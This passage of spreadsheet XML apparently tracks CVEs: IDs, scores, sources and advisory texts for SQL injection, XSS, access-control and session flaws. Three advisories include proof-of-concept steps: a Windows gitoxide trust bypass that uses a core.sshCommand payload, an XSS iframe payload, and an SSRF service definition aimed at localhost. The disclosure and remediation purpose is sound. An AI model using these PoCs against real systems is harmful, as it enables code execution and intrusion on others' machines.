          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1255" s="5" t="inlineStr"/>
      <c r="H1255" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1255" s="5" t="inlineStr"/>
      <c r="J1255" s="5" t="inlineStr"/>
      <c r="K1255" s="5" t="inlineStr"/>
      <c r="L1255" s="5" t="inlineStr"/>
      <c r="M1255" s="5" t="inlineStr"/>
      <c r="N1255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1255" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1255" s="5" t="inlineStr"/>
      <c r="Q1255" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R1255" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Mstfakts College-Management-System. The affected element is an unknown function of the file Front-end/server.php of the component Logout Handler. Such manipulation of the argument log_out leads to session expiration. It is possible to launch the attack remotely. The exploit is publicly available and might be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86215</t>
        </is>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1256" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86234</t>
        </is>
      </c>
      <c r="D1256" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1256" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1256" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1256" s="5" t="inlineStr"/>
      <c r="H1256" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1256" s="5" t="inlineStr"/>
      <c r="J1256" s="5" t="inlineStr"/>
      <c r="K1256" s="5" t="inlineStr"/>
      <c r="L1256" s="5" t="inlineStr"/>
      <c r="M1256" s="5" t="inlineStr"/>
      <c r="N1256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1256" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1256" s="5" t="inlineStr"/>
      <c r="Q1256" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1256" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in itsourcecode Sales and Inventory System 1.0. This affects an unknown part of the file /pages/cust_transac.php?action=add. The manipulation of the argument firstname results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S1256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86234</t>
        </is>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1257" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86265</t>
        </is>
      </c>
      <c r="D1257" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1257" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1257" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1257" s="5" t="inlineStr"/>
      <c r="H1257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1257" s="5" t="inlineStr"/>
      <c r="J1257" s="5" t="inlineStr"/>
      <c r="K1257" s="5" t="inlineStr"/>
      <c r="L1257" s="5" t="inlineStr"/>
      <c r="M1257" s="5" t="inlineStr"/>
      <c r="N1257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1257" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1257" s="5" t="inlineStr"/>
      <c r="Q1257" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1257" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Sales and Inventory System 1.0. Affected by this vulnerability is an unknown functionality of the file /pages/us_transac.php. Such manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S1257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86265</t>
        </is>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1258" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86279</t>
        </is>
      </c>
      <c r="D1258" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1258" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1258" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1258" s="5" t="inlineStr"/>
      <c r="H1258" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1258" s="5" t="inlineStr"/>
      <c r="J1258" s="5" t="inlineStr"/>
      <c r="K1258" s="5" t="inlineStr"/>
      <c r="L1258" s="5" t="inlineStr"/>
      <c r="M1258" s="5" t="inlineStr"/>
      <c r="N1258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1258" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1258" s="5" t="inlineStr"/>
      <c r="Q1258" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="R1258" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. The impacted element is an unknown function of the file auth_process.php of the component Login. This manipulation causes session fixiation. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="S1258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86279</t>
        </is>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1259" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86285</t>
        </is>
      </c>
      <c r="D1259" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1259" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1259" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1259" s="5" t="inlineStr"/>
      <c r="H1259" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1259" s="5" t="inlineStr"/>
      <c r="J1259" s="5" t="inlineStr"/>
      <c r="K1259" s="5" t="inlineStr"/>
      <c r="L1259" s="5" t="inlineStr"/>
      <c r="M1259" s="5" t="inlineStr"/>
      <c r="N1259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1259" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1259" s="5" t="inlineStr"/>
      <c r="Q1259" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="R1259" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in BookStack up to 26.05.2. Affected by this issue is the function AttachmentController::getUpdateForm of the file app/Uploads/Controllers/AttachmentController.php of the component Attachment Edit Endpoint. The manipulation of the argument ID results in improper access controls. The attack may be launched remotely. The exploit is now public and may be used. The patch is identified as 4e406c41c4c8060a5795e74c66fb96362e54f400. It is advisable to implement a patch to correct this issue.</t>
        </is>
      </c>
      <c r="S1259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86285</t>
        </is>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87923</t>
        </is>
      </c>
      <c r="D1260" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1260" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1260" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1260" s="5" t="inlineStr"/>
      <c r="H1260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1260" s="5" t="inlineStr"/>
      <c r="J1260" s="5" t="inlineStr"/>
      <c r="K1260" s="5" t="inlineStr"/>
      <c r="L1260" s="5" t="inlineStr"/>
      <c r="M1260" s="5" t="inlineStr"/>
      <c r="N1260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1260" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1260" s="5" t="inlineStr"/>
      <c r="Q1260" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1260" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. Affected by this issue is some unknown functionality of the file includes/DBOperation.php of the component List Handler. This manipulation of the argument category_name/brand_name/product_name causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87923</t>
        </is>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1261" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86181</t>
        </is>
      </c>
      <c r="D1261" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1261" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1261" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1261" s="5" t="inlineStr"/>
      <c r="H1261" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1261" s="5" t="inlineStr"/>
      <c r="J1261" s="5" t="inlineStr"/>
      <c r="K1261" s="5" t="inlineStr"/>
      <c r="L1261" s="5" t="inlineStr"/>
      <c r="M1261" s="5" t="inlineStr"/>
      <c r="N1261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1261" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1261" s="5" t="inlineStr"/>
      <c r="Q1261" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1261" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in code-projects Task Management System 1.0. Affected by this issue is some unknown functionality of the file /user/UpdateUserProfile.php of the component User Profile Update. The manipulation of the argument lname results in cross site scripting. The attack can be launched remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="S1261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86181</t>
        </is>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1262" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86271</t>
        </is>
      </c>
      <c r="D1262" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1262" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1262" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1262" s="5" t="inlineStr"/>
      <c r="H1262" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1262" s="5" t="inlineStr"/>
      <c r="J1262" s="5" t="inlineStr"/>
      <c r="K1262" s="5" t="inlineStr"/>
      <c r="L1262" s="5" t="inlineStr"/>
      <c r="M1262" s="5" t="inlineStr"/>
      <c r="N1262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1262" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1262" s="5" t="inlineStr"/>
      <c r="Q1262" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="R1262" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in FluentCMS up to 0.0.5. This affects the function GetAccessible of the file src/Backend/FluentCMS.Services/Permissions/PermissionManager.cs. Performing a manipulation results in missing authorization. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86271</t>
        </is>
      </c>
    </row>
    <row r="1263">
      <c r="A1263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1263" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86227</t>
        </is>
      </c>
      <c r="D1263" s="5" t="n">
        <v>1.3</v>
      </c>
      <c r="E1263" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1263" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1263" s="5" t="inlineStr"/>
      <c r="H1263" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1263" s="5" t="inlineStr"/>
      <c r="J1263" s="5" t="inlineStr"/>
      <c r="K1263" s="5" t="inlineStr"/>
      <c r="L1263" s="5" t="inlineStr"/>
      <c r="M1263" s="5" t="inlineStr"/>
      <c r="N1263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1263" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1263" s="5" t="inlineStr"/>
      <c r="Q1263" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="R1263" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in valkey-io valkey up to 9.0.5/9.1.1. This affects the function kvstoreGetHashtable of the file src/kvstore.c. This manipulation of the argument didx causes out-of-bounds read. It is possible to initiate the attack remotely. The attack is considered to have high complexity. It is indicated that the exploitability is difficult. The exploit has been made available to the public and could be used for attacks. Patch name: 4691888e7fab3df128f0bde5750c9fde2ae552fa. To fix this issue, it is recommended to deploy a patch. Exploitation requires cluster mode plus attacker-controlled dump.rdb at startup (data-dir write access, replication feed, or a stored crafted RDB) - an attacker-position DoS at boot, not network pre-auth. The issue report was closed stating it "is worth fixing for the sake of memory safety… but I don't think it meets our bar for a security disclosure."</t>
        </is>
      </c>
      <c r="S1263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86227</t>
        </is>
      </c>
    </row>
    <row r="1264">
      <c r="A1264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1264" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1264" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-24890</t>
        </is>
      </c>
      <c r="D1264" s="5" t="inlineStr"/>
      <c r="E1264" s="5" t="inlineStr"/>
      <c r="F1264" s="5" t="inlineStr"/>
      <c r="G1264" s="5" t="inlineStr"/>
      <c r="H1264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1264" s="5" t="inlineStr"/>
      <c r="J1264" s="5" t="inlineStr"/>
      <c r="K1264" s="5" t="inlineStr"/>
      <c r="L1264" s="5" t="inlineStr">
        <is>
          <t>rust:gix-sec</t>
        </is>
      </c>
      <c r="M1264" s="5" t="inlineStr">
        <is>
          <t>0.13.3</t>
        </is>
      </c>
      <c r="N1264" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1264" s="5" t="inlineStr"/>
      <c r="P1264" s="5" t="inlineStr"/>
      <c r="Q1264" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="R1264" s="5" t="inlineStr">
        <is>
          <t>### Summary
In a process run with full administrative rights on Windows, `gix-sec` wrongly treats all locations as trusted, leading to the execution of commands configured in repositories controlled by limited user accounts.
### Details
In a similar way to Git, gitoxide tries to avoid operating in local repositories that it neither considers to be owned by the current user nor finds to match any value of `safe.directory`. [This is because](https://git-scm.com/docs/git.html#_security) of the numerous commands that can be configured for a Git repository, to run as part of various actions, some of which even occur automatically due to the way custom shell prompts and text editors update their knowledge of repositories.
On Unix-like operating systems, every directory is considered to be owned by some user ID. On Windows, other identities can own a directory in the same sense that a user can, and directories created while operating with full administrative rights default to being owned by the `Administrators` group, not the specific user. Such administrators should be able to use what are, conceptually, their own repositories. So Git considers administrators (when operating this way) to own them.
Code in `gix-sec` intends to implement a similar check. But after finding that it is run with an administrative token, it needs to check if the directory is owned by the `Administrators` group, yet instead accidentally examines *itself* again, rather than the directory.
Specifically, in `gix_sec::identity` the [implementation](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-sec/src/identity.rs#L81) of `is_path_owned_by_current_user` for Windows [finds the owner of the directory](https://github.com/GitoxideLabs/gitoxide/blob/ffb73b5f69dbe86ff88f1c473af65f368a6bcbe5/gix-sec/src/identity.rs#L109-L121) (`folder_owner`), [finds the owner of the running thread or process](https://github.com/GitoxideLabs/gitoxide/blob/ffb73b5f69dbe86ff88f1c473af65f368a6bcbe5/gix-sec/src/identity.rs#L151-L189) (`token_owner`), checks cases of ownership not specific to administrators, then attempts to check the administrator-specific case with:
https://github.com/GitoxideLabs/gitoxide/blob/ffb73b5f69dbe86ff88f1c473af65f368a6bcbe5/gix-sec/src/identity.rs#L197-L207
The [`IsWellKnownSid`](https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-iswellknownsid) call checks if the owner of the current thread or process is the `Administrators` group. By default, operations carried out when running as an administrator with UAC elevation--or using an administrative account for which UAC is turned off altogether--create not just files and directories with the `Administrators` group as the owner, but other [securable objects](https://learn.microsoft.com/en-us/windows/win32/secauthz/securable-objects) as well, including processes and threads. So this check returns true. (Based on the comment, it may be that this was really meant to check if the *directory* is owned by an administrator. But nothing related to the directory appears in this check.)
The [`CheckTokenMembership`](https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-checktokenmembership) call checks if the owner of the current thread or process is an identity enabled in the access token represented by the token handle of `NULL`, passed as `0`. But a token handle of `NULL` represents the running thread. Consequently, if we have gotten this far--which happens when running with full administrative rights--in nearly all situations this will return true as well. (Based on the message, it may be that this was really meant to check if the user is an *administrator*. But nothing related to the `Administrators` group appears in this check.)
### PoC
These examples use `gix fetch` for simplicity, but some other actions implemented in gitoxide are vulnerable, as well as any provided by applications that rely on the results of `gix-sec` checks. 
#### Example 1: From inside a shared or user profile directory
On Windows, running as a limited user account, create a repository in a shared location like `C:\Users\Public`, or even within the limited user's user profile directory. Configure a fake (or, if preferred, real) remote and a value of `core.sshCommand` that runs an arbitrary payload. For example, in PowerShell:
```powershell
git init unsafe-repo
cd unsafe-repo
git remote add origin ssh://localhost/repo.git
git config core.sshCommand 'calc.exe; ssh'
```
Switch from the limited account to an administrative account. Then:
1. If gitoxide is not installed, install it, such as with `cargo install gitoxide`.
2. Run PowerShell with UAC elevation, so that it and processes started in it have an unfiltered token. (If UAC is turned off for this account, then just run PowerShell normally.)
3. This example will not work if the `GIT_SSH_COMMAND` environment variable is set. It is not usually set, but if it may be, you can unset it in the current shell environment by running `$env:GIT_SSH_COMMAND = $null`.
4. `cd` to the limited user's repository as created above.
5. Run `gix fetch`. This runs the Windows calculator (the chosen payload).
#### Example 2: From anywhere
On Windows, even limited user accounts can create directories in the root of the system drive. As a limited user--and assuming the system drive is `C:`--initialize `C:\` itself as a repository. Set up the repository to run the payload, either by editing `C:\.git\config` manually, or by running the `git remote` and `git config` commands from example 1 but passing `-c safe.directory=.`. The second approach is as follows:
```powershell
cd C:\
git init
git -c safe.directory=. remote add origin ssh://localhost/repo.git
git -c safe.directory=. config core.sshCommand 'calc.exe; ssh'
```
(`-c safe.directory=.` keeps `git` from refusing to run the `git remote` and `git config` commands on the repository it has just created, whose `.git` directory is under its control but whose working tree is not.)
The entire system drive is now a Git repository due to the presence of `C:\.git`. The limited user owns this `.git` directory and controls the configuration in it. Normally `safe.directory` protections keep this from being a problem. But they are ineffective for administrators running applications (such as the `gix` command) that use `gix-sec` to enforce those protections.
Switch from the limited account to an administrative account. Follow the instructions for the administrator from example 1, except do so from *any* directory anywhere on the `C:` drive that is not in its own repository. Unless `GIT_CEILING_DIRECTORIES` is set in such a way that keeps `C:\` from being considered, running `gix fetch` again runs the Windows calculator. This happens even if the command is run from inside the administrator's own user profile directory.
### Impact
A user is affected only when *all* of the following apply:
- The operating system is Windows.
- The user is a member of the `Administrators` group.
- The program is run with the user's unfiltered token. This happens when UAC is enabled and the user runs the program with UAC elevation, as well as when UAC is disabled. (Running as an administrator but enabling UAC and running the program unelevated is sufficient to avoid this vulnerability.)
- The program uses and relies on information from `gix-sec` about what directories to trust.
- The program interacts with a repository owned by, and set up or controlled by, another user.
Then operations that would run code present in a repository's configuration or hooks when the repository is trusted will be performed in any repository. These operations often require user interaction. But this interaction may not seem to the user like it involves operations on a repository, if it is performed as part of a custom prompt for a shell, or by other software that integrates with repositories. It may also not seem like it involves operation on files controlled by another user, such as when the repository is the root of the system drive.
A malicious user with a limited account on the system may therefore be able to arrange for an administrator to run arbitrary code. However, this vulnerability does not affect cloning repositories or using repositories one has cloned, because cloning does not copy configuration and hooks into the local repository.
The specific attack of making the root of the system drive a repository resembles [CVE-2022-24765](https://github.com/git-for-windows/git/security/advisories/GHSA-vw2c-22j4-2fh2). The workarounds presented there do not work around this vulnerability in full, but would prevent that kind of attack.</t>
        </is>
      </c>
      <c r="S1264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-24890</t>
        </is>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1265" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1265" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-24978</t>
        </is>
      </c>
      <c r="D1265" s="5" t="inlineStr"/>
      <c r="E1265" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1265" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1265" s="5" t="inlineStr"/>
      <c r="H1265" s="5" t="inlineStr"/>
      <c r="I1265" s="5" t="inlineStr"/>
      <c r="J1265" s="5" t="inlineStr"/>
      <c r="K1265" s="5" t="inlineStr"/>
      <c r="L1265" s="5" t="inlineStr">
        <is>
          <t>go:github.com/lf-edge/ekuiper/v2</t>
        </is>
      </c>
      <c r="M1265" s="5" t="inlineStr">
        <is>
          <t>2.4.0</t>
        </is>
      </c>
      <c r="N1265" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1265" s="5" t="inlineStr"/>
      <c r="P1265" s="5" t="inlineStr"/>
      <c r="Q1265" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1265" s="5" t="inlineStr">
        <is>
          <t>### Summary
A Cross-Site Scripting (XSS) vulnerability in external service creation allows an authenticated attacker to inject HTML/script payloads into external service names, which may execute in a user's browser when rendered by administrative web interfaces.
### Details
Prior to v2.4.0, external service registration endpoints did not strictly enforce alphanumeric character restrictions on service names. An operator or attacker with API access could register a service using a crafted name containing HTML elements (such as `&lt;iframe src="..."&gt;`). If an administrative web UI rendered the unescaped service name, arbitrary script execution could occur in the context of the user's browser session.
### PoC
1. Create an external service JSON definition with a filename containing an XSS payload, e.g. `&lt;iframe src="javascript:alert`1337`"&gt;.json` inside a ZIP archive.
2. In external service creation, upload the ZIP and provide the matching service name: `&lt;iframe src="javascript:alert`1337`"&gt;`.
3. Upon service registration, the unescaped name executes when rendered in the UI context.
### Impact
Self-XSS / Stored XSS leading to potential session token leakage or unauthorized actions in the context of the affected user's browser session.
### Remediation &amp; Patches
- **Upgrade to eKuiper &gt;= 2.4.0**: Strict alphanumeric identifier validation (`validate.ValidateID`) is now enforced on all external service creation and update endpoints, rejecting invalid characters.
### Workarounds
- Protect eKuiper management endpoints (`POST /services`) with authentication and network-level firewalls.
### Credits
- Reported by Alexey Kosmachev, Bi.Zone (@TheMostKnown)</t>
        </is>
      </c>
      <c r="S1265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-24978</t>
        </is>
      </c>
    </row>
    <row r="1266">
      <c r="A1266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1266" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1266" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-24979</t>
        </is>
      </c>
      <c r="D1266" s="5" t="inlineStr"/>
      <c r="E1266" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1266" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1266" s="5" t="inlineStr"/>
      <c r="H1266" s="5" t="inlineStr"/>
      <c r="I1266" s="5" t="inlineStr"/>
      <c r="J1266" s="5" t="inlineStr"/>
      <c r="K1266" s="5" t="inlineStr"/>
      <c r="L1266" s="5" t="inlineStr">
        <is>
          <t>go:github.com/lf-edge/ekuiper/v2</t>
        </is>
      </c>
      <c r="M1266" s="5" t="inlineStr">
        <is>
          <t>2.4.0</t>
        </is>
      </c>
      <c r="N1266" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1266" s="5" t="inlineStr"/>
      <c r="P1266" s="5" t="inlineStr"/>
      <c r="Q1266" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1266" s="5" t="inlineStr">
        <is>
          <t>### Summary
Server-side request forgery (SSRF) vulnerability in eKuiper allows an attacker with permissions to register external services or create rules to induce the eKuiper server to make requests to unintended network locations, such as internal services, loopback interfaces (localhost), or cloud metadata endpoints.
### Details
Prior to v2.4.0, eKuiper external service registrations and HTTP invocations did not validate destination IP addresses. An attacker with access to the eKuiper management API could register an external service pointing to an internal address (such as `http://127.0.0.1:9081` or other internal network services) and trigger queries using service functions (e.g. `SELECT tsschemaless(...) FROM demo`). This allows probing internal networks, leaking sensitive information (such as internal endpoints/credentials), or interacting with internal APIs accessible to the eKuiper host.
### PoC
1. Create an external service with an address pointing to an internal network / localhost:
```json
{
  "interfaces": {
    "tsschemaless": {
      "address": "http://127.0.0.1:9081",
      "protocol": "rest",
      "options": {
        "insecureSkipVerify": true,
        "headers": {
          "Accept-Charset": "utf-8"
        }
      },
      "schemaless": true
    }
  }
}
```
2. Load it to eKuiper and create a rule invoking it, e.g.: `SELECT tsschemaless("get", "/metadata/sources/yaml/mqtt", *) FROM demo`.
3. Run the rule. When data flows through the stream, the response from the internal service is retrieved and can be routed to an external sink or inspected.
### Impact
Server-Side Request Forgery (SSRF) allowing unauthorized access / probing of internal network services.
### Remediation &amp; Patches
- **Upgrade to eKuiper &gt;= 2.4.0**: Starting with v2.4.0, SSRF protection (`httpx.GetSSRFDialContext`) is enabled by default across HTTP clients, blocking requests to private, loopback, link-local, multicast, and unspecified IP addresses.
### Workarounds (for versions &lt; 2.4.0)
If unable to upgrade immediately:
1. **Restrict Management API Access**: Restrict access to the eKuiper REST API (port 9081) and CLI using network firewalls, reverse proxies, and authentication so only trusted administrators can create or update services and rules.
2. **Egress Network Filtering**: Use firewall / iptables rules or container network isolation to block outbound requests from eKuiper to private subnets, loopback addresses, and cloud metadata endpoints (`169.254.169.254`).
3. **Audit Service Definitions**: Regularly review registered external services (`GET /services` or `bin/kuiper show services`) to verify target hosts.
### Notes for Users Upgrading to &gt;= 2.4.0
